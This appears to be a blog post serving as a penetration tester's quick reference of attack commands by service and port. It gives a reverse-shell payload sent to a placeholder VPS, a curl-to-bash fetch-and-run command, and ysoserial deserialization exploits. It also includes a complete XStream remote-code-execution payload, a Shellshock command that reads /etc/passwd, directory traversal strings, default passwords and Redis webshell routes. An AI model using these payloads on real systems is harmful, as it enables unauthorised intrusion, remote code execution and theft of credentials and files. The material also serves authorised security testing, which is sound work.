Vorder's blog

Detection Point Memo

2019/12/16

Since the earlier knowledge-index article has grown too long, and most of it records newly established knowledge points and bypass methods,
I'm starting a new article to record the host-level detection points and detection methods I use day to day.

Test points / methods quick reference:

# OpenSSL RC4 check
openssl s_client -connect xxx -cipher RC4
nmap --script ssl-enum-ciphers -p xx xxx

# Slow DoS check
slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.loveuv.net -p 3

# NFS check, port 111
rpcinfo  # confirm the port is open
showmount -e xx.xx.xx.xx
# first: apt-get install nfs-common
https://www.freebuf.com/articles/network/159468.html

# Oracle TNS Listener Remote Poisoning check
tnspoison_checker module in msf

# ajp13: AJP protocol on Tomcat port 8009
https://github.com/limkokhole/CVE-2011-3192 # DoS attack, test with caution

# java_rmi
CVE-2019-12409
java -cp ysoserial-0.0.3-all.jar ysoserial.exploit.RMIRegistryExploit xx.xx.xx.xx 1099 CommonsCollections1 "ping xxxxx.dnslog.cn"

# ZooKeeper unauthenticated access
echo envi|nc xx.xx.xx 2181

# DNS zone transfer
nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=xxxxx.com" -Pn -p 53 1.1.1.1

# redis
redis-cli -h xx.xx.xx.xx -p xx
info

Master-slave replication: https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
1. When the Redis permissions allow writing files
Linux: write a cron job; Windows: write to the startup directory; if possible, write a webshell into the web directory
2. When the Redis permissions do not allow writing files
If JSON strings are found in the Redis records, try writing a Fastjson or Jackson deserialization payload
If records carrying the AC ED serialization signature are found, try writing serialized data generated by ysoserial

# zebra 2601, 2604
telnet xxx 2601
# default password: zebra
en  # switch to privileged mode
show ip ospf route  # show routes

# rexec 514
brute-force with hydra-gtk

# ms15-034
curl -k http://[host:port]/ -H "Host: [host:port]" -H "Range: bytes=0-18446744073709551615"|grep "Requested Range Not Satisfiable"

# spark 6066 8080 7077 8081
https://github.com/aRe00t/rce-over-spark.git
./submit.sh xxxxx:6066 2.3.0 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/[vps]/2333 0>&1"
spark_unauth_rce in msf

# amqp 5672
https://xz.aliyun.com/t/36
https://github.com/m3ssap0/spring-break_cve-2017-8046

# finger 79
finger_users module in msf, or finger -ls @xx.xx.xx.xx
finger @xx.xx.xx.xx  # are any users logged in

# supervisor 9001
CVE-2017-11610
https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

# tomcat
Apache Tomcat < 6.0.18 'utf8' Directory Traversal CVE-2008-2938 (requires context.xml or server.xml to allow 'allowLinking' and 'URIEncoding')
< 6.0.19 XSS /examples/jsp/cal/cal2.jsp?time=" accesskey=x onclick=alert(1)
/jsp-examples/cal/cal2.jsp?time=" accesskey=x onclick=alert(1)
[manager + version < 7] /manager/html brute-force
[PUT] curl -X PUT http://xxxxxxx:port/test.jsp/ -d @- < test.jsp
<% out.write("<html><body><h3>[+] hello</h3></body></html>"); %>
CVE-2016-8735 java -cp .\ysoserial.jar ysoserial.exploit.RMIRegistryExploit xx.xx.xx.xx 10001 Groovy1 "cmd.exe /c curl xxxxx:2333"
CVE-2019-0232 curl -k "http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user" # Windows; requires CGIServlet and enableCmdLineArguments to be enabled (disabled by default)

# apache
curl "http://localhost/jkstatus;"

CVE-2019-0211 # < 2.4.17, privilege escalation to root

# HP iLO4
CVE-2017-12542 admin/hp/hp_ilo_create_admin_account in msf https://www.freebuf.com/vuls/167124.html
More exploitation: https://github.com/airbus-seclab/ilo4_toolbox

# vnc
scanner/vnc/vnc_none_auth in msf
vncviewer xx.xx.xx.xx  # connect

# activemq
- CVE-2016-3088
- CVE-2019-17571
java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin
nc 127.0.0.1 4560 < log4j.curl.bin

# iis 80
windows/iis/iis_webdav_scstoragepathfromurl in msf (requires Win2003 with the WebDAV service enabled)
PUT write vulnerability

# smtp 25
SMTP spoofing; swaks can also be used
nc xxxxx.com 25
EHLO qq.com
MAIL FROM:admin@qq.com
RCPT TO:test@test.com
DATA
"message body"
.
QUIT

# mysql
< 5.5.24
mysql_authbypass_hashdump

# FreeSWITCH
1.6.10 - 1.10.1
multi/misc/freeswitch_event_socket_cmd_exec

# Gemalto Sentinel License Manager, also called HASP LM
Directory traversal http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt

# GlassFish
Directory traversal
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config

# Bash Shellshock
curl -A "() { foo;};echo;/bin/cat /etc/passwd" http://**.**.**.**/cgi-bin/test-cgi

# rtmp
VLC - Network stream - rtmp://ip:port/<short address>/<stream key>

xx/admin/?c=session&a=index
Password reset (mu/d.u live streaming)

# HP System Management Homepage / HP SMH
hp_sys_mgmt

# rexec
rlogin -l root xx.xx.xx.xx
scanner/rservices/rlogin_login
scanner/rservices/rexec_login

# solr
CVE-2019-12409
CVE-2019-0193

# spring
Exploit collection: https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/

# Spring Cloud

/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd
/foo/default/master/..(_)..(_)..(_)..(_)..(_)1.txt

# harbor

Default password: Harbor12345
CVE-2019-16097

# thinkphp
RCE ThinkPHP 5.0.x-5.0.23


# ueditor
.NET 1.4.3.3 and 1.5.0 getshell
POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

# fastjson
https://paper.seebug.org/1192/#fastjson_3
{"@type":"java.net.Inet4Address", "val":"http://xxxx.dnslog.cn"}
Set[{"@type":"java.net.URL", "val":"http://xxxx.dnslog.cn"}]

{"name":"S", "age":21}
{"name":"S", "age":21,"agsbdkjada__ss_d":123}
fastjson does not error on the unknown field
jackson errors

DoS check
eyJhIjoiXHgaGiJ9 (base64-decode the parameter)

# shiro
Deserialization: Shiro-550
Byte-flipping attack: Shiro-721, requires a valid rememberMe obtained after logging in
Auth bypass CVE-2020-1957, /xxxx/..;/admin/index

# xpose+xserver
https://xz.aliyun.com/t/7669

# XStream
POST request
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="java.lang.ProcessBuilder">
<command>
<string>ping</string>
<string>xxx.dnslog.cn</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</delegate>
<owner class="java.lang.ProcessBuilder" reference="../delegate"/>
<resolveStrategy>0</resolveStrategy>
<directive>0</directive>
<parameterTypes/>
<maximumNumberOfParameters>0</maximumNumberOfParameters>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>123</int>
</entry>
</map>

# Weaver OA (泛微)
https://www.cnblogs.com/AtesetEnginner/p/11558469.html

# Sangfor VPN

admin/123456/Sangfor/Sangfor@123
wget -t xxx.dnslog.cn -T 5 --spider 1 |curl http://xxx/a|bash

# Fortigate VPN
https://github.com/milo2012/CVE-2018-13379
https://github.com/milo2012/CVE-2018-13382

# Pulse Secure SSL VPN
Arbitrary file read https://github.com/projectzeroindia/CVE-2019-11510
Post-auth command injection https://github.com/0xDezzy/CVE-2019-11539

# Exchange
https://github.com/Ridter/Exchange2domain
https://github.com/Ridter/cve-2020-0688
https://xz.aliyun.com/t/7299

# Confluence
RCE CVE-2019-3396, https://github.com/jas502n/CVE-2019-3396

# Ghostscript (image upload that returns a thumbnail)

https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116

# Hikvision
http://ip/System/configurationFile?auth=YWRtaW46MTEK
decode https://github.com/WormChickenWizard/hikvision-xor-decrypter

Port pentest quick reference:

| Port | Service | Test method |
|------|---------|-------------|
| 22 | ssh | CVE-2018-15473 |
| 23 | telnet | telnet xx.xx.xx.xx [port] |
| 25 | SMTP | swaks, SMTP spoofing |
| 42 | wins | MS11-035 (DoS vulnerability) |
| 53 | dns | nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=xxxxx.com" -Pn -p 53 1.1.1.1 |
| 79 | finger | finger_users module in msf, or finger -ls @xx.xx.xx.xx |
| 85 | Sangfor | |
| 110 | pop3 | |
| 111, 1025 | nfs | showmount -e xx.xx.xx.xx |
| 389 | ldap | injection, unauthenticated access |
| 443 | ssl | nmap --script ssl-enum-ciphers -p xx xxx |
| 445 | smb | MS17-010 (Vista to Win10) |
| 512, 513, 514 | rexec | brute-force with hydra-gtk |
| 1098, 1099, 1090 | rmi | command execution, nmap -p1099 -sV --script=rmi* |
| 1521 | oracle | tnspoison_checker module in msf |
| 2181 | zookeeper | echo envi \| nc xx.xx.xx 2181 |
| 2323 | uep | /config/CorrectConfigPwd.sh |
| 2381 | hp sys mgmt | exploit/multi/http/hp_sys_mgmt_exec in msf |
| 1621 | Cisco Mobility Services Engine | CVE-2013-3469 |
| 2601, 2604 | zebra | telnet xxx 2601, default password zebra |
| 3128 | squid | squidclient -h xx.xx.xx.xx -p 80 mgr:info |
| 3389 | rdp | CVE-2019-0708, esteemaudit, MS12-020, sticky keys (shift), magnifier, IME bypass, guest user |
| 5672 | amqp | CVE-2017-8045 |
| 5900 | vnc | scanner/vnc/vnc_none_auth in msf, CVE-2006-2369: admin/vnc/realvnc_41_bypass |
| 5984 | CouchDB | weak password |
| 6066, 7077 | spark | spark_unauth_rce in msf |
| 6379 | redis | redis-cli -h xx.xx.xx.xx -p xx, master-slave replication |
| 7001 | weblogic | weblogicScan, t3 vulnerabilities |
| 8161 | activemq | CVE-2016-3088, CVE-2015-5254 |
| 8291 | winbox | CVE-2018-14847: https://github.com/BasuCert/WinboxPoC |
| 8088 | hadoop | YARN ResourceManager, hadoop_unauth_exec in msf |
| 8091 | Confluence | RCE CVE-2019-3396 |
| 9001 | supervisor | CVE-2017-11610 |
| 9090 | jboss | |
| 9095 | huawei | Huawei operation and maintenance system |
| 9200 | Elasticsearch | unauthenticated access, RCE |
| 10001 | tomcat | CVE-2016-8735 |
| 11211 | Memcached | unauthenticated access |
| 27017 | MongoDB | weak password |
| 50070 | hadoop | unauthenticated access |
| 61616 | activemq | CVE-2015-5254 deserialization |